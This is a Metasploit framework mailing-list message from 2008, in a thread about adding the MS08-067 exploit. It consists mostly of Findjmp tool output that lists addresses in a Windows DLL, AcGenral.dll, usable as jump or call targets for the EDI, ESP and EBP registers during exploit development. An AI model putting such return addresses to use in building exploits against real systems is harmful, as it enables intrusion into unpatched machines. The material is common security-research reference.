0x6FDA6041 pop EDI - pop - retbis 0x6FDA62CE call EDI 0x6FDA6B3D pop EDI - pop - retbis 0x6FDA6BF6 pop EDI - pop - retbis 0x6FDA6CAF pop EDI - pop - retbis 0x6FDA6D68 pop EDI - pop - retbis 0x6FDA7DDB pop EDI - pop - retbis 0x6FDA83C5 call EDI 0x6FDA83D4 call EDI 0x6FDA847F call EDI 0x6FDA848E call EDI 0x6FDA8D87 pop EDI - pop - retbis 0x6FDAA0AE pop EDI - pop - retbis 0x6FDAB0CC pop EDI - pop - retbis 0x6FDAC3FB pop EDI - pop - retbis 0x6FDAC5AD pop EDI - pop - ret 0x6FDAE05E call EDI 0x6FDAE06D call EDI 0x6FDAE17C pop EDI - pop - retbis 0x6FDAE834 call EDI 0x6FDAE870 call EDI 0x6FDAEA71 pop EDI - pop - retbis 0x6FDAF509 pop EDI - pop - ret 0x6FDAF54A pop EDI - pop - ret 0x6FDAF96B pop EDI - pop - retbis 0x6FDB0524 pop EDI - pop - retbis 0x6FDB0636 call EDI 0x6FDB0A56 pop EDI - pop - retbis 0x6FDB1061 pop EDI - pop - retbis 0x6FDB1467 call EDI 0x6FDB1486 call EDI 0x6FDB19C7 call EDI 0x6FDB1A02 call EDI 0x6FDB1A32 call EDI 0x6FDB1D66 call EDI 0x6FDB1D78 call EDI 0x6FDB2336 call EDI 0x6FDB2351 call EDI 0x6FDB2866 pop EDI - pop - ret 0x6FDB29E6 pop EDI - pop - ret 0x6FDB3147 pop EDI - pop - ret 0x6FDB32C1 call EDI 0x6FDB32E8 call EDI 0x6FDB3367 call EDI 0x6FDB3391 call EDI 0x6FDB3451 call EDI 0x6FDB3477 call EDI 0x6FDB3AE8 call EDI 0x6FDB3B5C call EDI 0x6FDB3DD6 pop EDI - pop - retbis 0x6FDB4152 pop EDI - pop - ret 0x6FDB4E6E pop EDI - pop - ret 0x6FDB535A call EDI 0x6FDB5423 call EDI 0x6FDB5452 call EDI 0x6FDB73DB pop EDI - pop - ret 0x6FDB73E2 pop EDI - pop - ret 0x6FDB73E9 pop EDI - pop - ret 0x6FDB77B2 pop EDI - pop - ret 0x6FDB7EF1 pop EDI - pop - ret 0x6FDB860F pop EDI - pop - ret 0x6FDB8B02 call EDI 0x6FDB8B0D call EDI 0x6FDB8FE5 pop EDI - pop - ret 0x6FDBE4AB call EDI 0x6FDBE4C8 call EDI Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EDI register Found 100 usable addresses Findjmp, Eeye, I2S-LaB Findjmp2, Hat-Squad Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ESP register 0x6FD9D83D call ESP Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ESP register Found 1 usable addresses Findjmp, Eeye, I2S-LaB Findjmp2, Hat-Squad Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EBP register 0x6FD9840B call EBP 0x6FDBFCEF call EBP 0x6FE77B85 jmp EBP 0x6FF5271F jmp EBP Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EBP register Found 4 usable addresses -- http://secdev.zoller.lu Thierry Zoller _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081029/0c29cd7a/attachment.htm>
Current thread:
- MS08-067 added to SVN trunk (3.2-testing) H D Moore (Oct 28)
- MS08-067 added to SVN trunk (3.2-testing) Giorgio Casali (Oct 28)
- Message not available
- Message not available
- Message not available
- Message not available
- Message not available
- Message not available
- MS08-067 added to SVN trunk (3.2-testing) Giorgio Casali (Oct 28)
- MS08-067 added to SVN trunk (3.2-testing) Jerome Athias (Oct 28)
- MS08-067 added to SVN trunk (3.2-testing) Thierry Zoller (Oct 28)
- MS08-067 added to SVN trunk (3.2-testing) Ulises2k (Oct 29)
- MS08-067 added to SVN trunk (3.2-testing) H D Moore (Oct 29)
- MS08-067 added to SVN trunk (3.2-testing) Ulises2k (Oct 29)
- MS08-067 added to SVN trunk (3.2-testing) Giorgio Casali (Oct 30)
- MS08-067 added to SVN trunk (3.2-testing) think.pink at gmx.de (Nov 01)
- MS08-067 added to SVN trunk (3.2-testing) H D Moore (Nov 01)
- MS08-067 added to SVN trunk (3.2-testing) base64 (Nov 01)
- MS08-067 added to SVN trunk (3.2-testing) base64 (Nov 01)
- Message not available
- MS08-067 added to SVN trunk (3.2-testing) Vlatko Kosturjak (Nov 03)
- MS08-067 added to SVN trunk (3.2-testing) Giorgio Casali (Nov 04)
- MS08-067 added to SVN trunk (3.2-testing) Valter Santos (Nov 04)
- MS08-067 added to SVN trunk (3.2-testing) Giorgio Casali (Oct 28)